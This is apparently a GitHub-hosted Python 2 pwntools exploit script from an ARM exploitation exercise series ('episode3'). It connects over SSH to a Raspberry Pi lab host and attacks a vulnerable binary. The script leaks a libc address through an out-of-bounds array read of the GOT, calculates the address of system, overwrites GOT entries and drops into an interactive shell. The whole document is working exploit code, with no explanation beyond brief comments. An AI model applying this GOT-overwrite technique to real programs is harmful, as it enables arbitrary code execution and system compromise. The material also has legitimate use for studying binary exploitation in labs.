Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
56 lines (43 sloc) 1.27 KB
#!/usr/bin/env python2
from pwn import *
ip = "192.168.0.13"
port = 22
user = "pi"
pwd = "toSet"
libc = ELF('libc-2.24.so')
gadget_offset = 0xed748
shell = ssh(user, ip, password=pwd, port=port)
sh = shell.run('/home/pi/arm/episode3/got_overw')
# fill the array
sh.recvuntil('array:\n')
sh.sendline('1852400175') # "nib/"
sh.sendline('6845231') # "hs/"
for i in range(0,10):
sh.sendline(str(i))
sh.recvuntil('read: \n')
# Leak the libc address
sh.sendline('-9') # offset to the libc in the GOT section
ret = sh.recvline().split()
libc_main = int(ret[6])
# libc_base = libc_main - libc_base_offset
libc_base = libc_main - libc.symbols['__libc_start_main']
log.info('libcbase: %#x' % libc_base)
# address of the system function
system_addr = libc_base + libc.symbols['system']
log.info('system address: %#x' % system_addr)
sh.recvuntil('[y/n]\n')
# do not read other values
sh.sendline('n')
sh.recvuntil('modify?\n')
# send the system function address
sh.sendline(str(system_addr))
sh.recvuntil('modify\n')
sh.sendline('-10') # offset of the put in the GOT section
sh.recvuntil('value\n')
# gadget address
gadget_address = libc_base + gadget_offset
log.info('gadget address: %#x' % gadget_address)
# send the gadget address
sh.sendline(str(gadget_address))
sh.interactive()
shell.close()